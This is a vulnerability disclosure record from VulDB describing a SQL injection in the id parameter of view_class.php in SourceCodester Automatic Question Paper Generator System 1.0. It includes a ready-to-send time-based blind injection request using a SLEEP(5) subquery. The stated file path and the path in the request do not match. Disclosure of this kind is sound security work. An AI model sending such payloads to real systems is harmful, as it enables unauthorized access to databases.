| Title | SourceCodester Automatic Question Paper Generator System GET Parameter view_class.php SQL Injection |
|---|
| Description | A SQL Injection vulnerability was found in SourceCodester Automatic Question Paper Generator System 1.0. The vulnerable file is admin/courses/view_class.php and the injectable parameter is id.
A time-based blind injection poc is:
GET /aqpg/users/classes/view_class.php?id=1' AND (SELECT 7504 FROM (SELECT(SLEEP(5)))lKSD) AND 'svPe'='svPe&_=16795545049481&_=1679554504948 HTTP/1.1 |
|---|
| Source | ⚠️ https://www.sourcecodester.com/php/15190/automatic-question-paper-generator-system-phpoop-free-source-code.html |
|---|
| User | WWesleywww (UID 43117) |
|---|
| Submission | 03/23/2023 08:00 (3 years ago) |
|---|
| Moderation | 03/23/2023 09:42 (2 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 223660 [SourceCodester Automatic Question Paper Generator System 1.0 GET Parameter view_class.php ID sql injection] |
|---|
| Points | 20 |
|---|